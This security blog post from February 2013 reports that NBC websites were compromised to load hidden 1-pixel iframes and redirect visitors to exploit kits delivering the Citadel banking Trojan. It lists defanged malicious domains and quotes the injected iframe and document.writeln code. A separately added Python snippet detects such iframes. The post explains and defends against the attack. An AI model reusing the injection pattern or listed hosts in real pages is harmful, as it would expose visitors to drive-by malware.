The Latest in IT Security

NBC Website HACKED – Be Careful Surfing

22 Feb 2013

Breaking: the NBC site is currently compromised and blacklisted by Google. Anyone who visits the site (including any sub-page) will have malicious iframes loaded, as well as being redirected to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Leno's Garage and others.

[Screenshot: 2013-02-21, 11:15:51 AM]

If you visit it from Chrome or Firefox, you will get the following warning:

[Screenshot: 2013-02-21, 11:18:14 AM]

It seems that the payload is conditional, so a different iframe domain is loaded each time (cycling out various domains). Some of the malicious domains we identified include:

hxxp://walterjeffers.com/
hxxp://nikweinstein.com/
hxxp://umaiskhan.com/
hxxp://wordpresspluginsstudio.com/ctuk.html

All their pages had this iframe injected:

<iframe src="httx://nikweinstein.com/cl/google.php" width=1 height=1..

And this is what got added to their JavaScript files:

document.writeln(" <iframe src=\"httx://walterjeffers.com/ctuk.html\" width=1 ..

Note that these domains are changing, which tells us that something on the server is generating the payload. This isn't an uncommon practice, and it also tells us that the script is likely still on the box. The fact that it's impacting other sites tells us that the compromise might extend beyond the web application and onto the server. If those other sites are stored on separate boxes, then we're looking at a much bigger, network-wide compromise, but that is speculative at the moment.
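For site owners who want to check for this pattern themselves, here is an added example (not code from the original post or from the research team) that looks for 1-pixel off-site iframes in both HTML and JavaScript bodies and flags when the injected host changes between fetches. The hostnames, the sample bodies and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# An <iframe ...> tag in raw HTML or inside a JS string (quotes may be escaped as \").
IFRAME_RE = re.compile(r'<iframe\b[^>]*', re.IGNORECASE)
ATTR_RE = re.compile(r'\b(src|width|height)\s*=\s*\\?["\']?([^\s"\'\\>]+)', re.IGNORECASE)
# Reports often defang the scheme (hxxp, httx, htxp); normalise it before parsing.
DEFANG_RE = re.compile(r'^h[tx]{2}[px](s?)://', re.IGNORECASE)

def hidden_iframes(text, own_host):
    """Return hosts of off-site iframes sized 0 or 1 pixel found in HTML or JS text."""
    hosts = []
    for tag in IFRAME_RE.findall(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        host = urlsplit(DEFANG_RE.sub(r'http\1://', attrs.get("src", ""))).hostname
        tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
        on_site = host is not None and (host == own_host or host.endswith("." + own_host))
        if host and tiny and not on_site:
            hosts.append(host)
    return hosts

def analyze(snapshots, own_host):
    """snapshots: response bodies from repeated fetches of the same site."""
    per_fetch = [frozenset(hidden_iframes(body, own_host)) for body in snapshots]
    infected = [s for s in per_fetch if s]
    return {
        "hosts": sorted(set().union(*per_fetch)),
        "infected_fetches": len(infected),
        # Different hosts across fetches point to a server-side generator, not a static edit.
        "rotating": len(set(infected)) > 1,
    }

# Constructed sample bodies (hostnames are placeholders, not the domains from the post).
SAMPLES = [
    '<html><body><iframe src="http://ads-one.example/cl/google.php" width=1 height=1>'
    '</iframe></body></html>',
    'document.writeln(" <iframe src=\\"http://ads-two.example/ctuk.html\\" width=1 height=1>'
    '</iframe>");',
    '<html><body><iframe src="https://video.news.example/player" width=640 height=360>'
    '</iframe></body></html>',
    '<html><body>clean</body></html>',
]

if __name__ == "__main__":
    print(analyze(SAMPLES, "news.example"))
```

A "rotating" result across repeated fetches is the sign that cleaning the visible files is not enough and the generating script on the server still has to be found.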

Our research team is analyzing the case (and the malware) and we will post more updates soon. What we can tell is that you should not visit NBC’s site right now. More details on the scan results here: http://sitecheck.sucuri.net/.

The folks at hitmanpro.blog are confirming that it is a drive-by-download attack, specifically using the Citadel Trojan, used for banking fraud and cyber-espionage. As for the attack vector leading to the compromise, that's always a challenge to speculate on.

It also appears that the compromise extends to other properties; we just found out that Late Night with Jimmy Fallon is also compromised:

[Screenshot: 2013-02-21, 11:48:24 AM]

****Update: 13:42 PST | 02/21/2013*****

We did come across this great post by Dancho Danchev in which he better explains things. It looks like this is, or was, a complex attack cycling out drive-by-downloads and malicious redirects. He adds the following domains to the growing list of those being cycled for the iframes:

hxxp://priceworldpublishing.com/aynk.html
hxxp://toplineops.com/mtnk.html
hxxp://moi-npovye-sploett.com/qqqq/1.php
hxxp://www.jaylenosgarage.com/trucks/PHP/google.php

He expands things with a list of domains being used for redirection:

hxxp://gonullersultani.net/znzd.htm
hxxp://erabisnis.net/znzd.htm
hxxp://electricianfortwayne.info/62.html
hxxp://moi-npovye-sploett.com/cGeQc0wz1KPI/larktion.php

He goes on to explain the payload being dropped and gives the payload hash. He breaks down its phone-home mechanisms and begins to correlate this attack with others to find some association. Based on his analysis, he correlates these attackers with the same group responsible for the Facebook and Verizon spear phishing attempts a few days ago. He goes on to provide a lot more data.

Some are attributing the payload itself to the RedKit Exploit Kit, but that is still unconfirmed.

While some folks are reporting it was only infected for 15 minutes, we're not too sure about that. As of right now, emulating a number of agents and crawling various links, we are still able to get it to render:

[Screenshot: 2013-02-21, 1:54:08 PM]
